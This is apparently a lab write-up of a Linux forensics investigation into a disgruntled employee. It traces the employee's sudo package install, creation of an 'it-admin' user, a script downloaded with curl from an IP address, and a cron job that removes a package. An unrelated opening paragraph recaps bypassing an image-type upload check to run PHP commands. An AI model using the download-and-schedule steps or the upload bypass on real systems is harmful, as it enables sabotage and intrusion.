We covered another file upload vulnerability where the vulnerable code contained a PHP function exif_imagetype to check on the image extension. We bypassed this restriction by changing the magic number of the file to appear as a GIF image then appended a short PHP one liner to execute system commands.. This was part of OverTheWire Natas Level 13 challenge.
Initial Investigation & Privileged Commands
I started by looking for privileged commands executed by the employee. To find commands run with sudo, I checked the authentication logs using cat /var/log/auth.log | grep -i "COMMAND". I then refined this to filter for commands related to package installation with cat /var/log/auth.log | grep -i "sudo" | grep "install". This revealed the installation of “dokuwiki.” From the same log entry, I identified the present working directory when “dokuwiki” was installed as /home/cyberT.
User Creation and Privilege Escalation
Next, I looked for user creation events after the package installation using cat /var/log/auth.log | grep -i "add user". This showed a user named “it-admin” was created, and the timestamp indicated this happened shortly after the dokuwiki installation.
I then checked when the sudoers file was updated to grant this new user sudo privileges. I used cat /var/log/auth.log | grep -i "vi /sudo" (implying visudo was used, which logs as vi /etc/sudoers.tmp or similar). The log entry associated with the cyberT user’s working directory was the relevant one.
Suspicious Script Activity
I investigated for files opened with the vi text editor. Initially, I checked for saved files using cat /home/it-admin/.viminfo | grep "save as", which revealed a file /bin/always_update was saved. To find opened files, I checked the authentication logs again, specifically filtering for vi commands executed by the it-admin user. This showed a script file named “bump.sh” was opened.
Suspecting bump.sh to be malicious but finding it deleted, I looked for how it was created by checking the bash history of the it-admin user. I navigated to /home/it-admin and ran cat .bash_history. This revealed the bump.sh script was downloaded using curl from an IP address and saved as bump (curl <IP_ADDRESS>/bump -o bump).
The script was then renamed and moved, so I checked scheduled tasks as the user likely wanted it to execute later. I used cat /etc/crontab, which showed a script /bin/OS-update was scheduled to run. This was the new name and location of the bump.sh script.
Analyzing the Malicious Script
I checked the last modification time of the /bin/OS-update script using ls -la /bin/OS-update. Then, I examined its contents with cat /bin/OS-update. The script contained commands to remove a package and echo taunting messages, including “I told you you would regret this” and “goodbye.” From the echo command output redirection within the script, I identified that a file named good_evidence would be created when this script executed. The crontab entry confirmed the /bin/OS-update script was scheduled to run daily at 8:00 AM.
In summary, I discovered that the disgruntled employee installed a package, created a new user (it-admin), granted it sudo privileges, downloaded a malicious script (bump.sh), renamed and moved it to /bin/OS-update, and scheduled it to run via cron to cause damage and leave taunting messages.
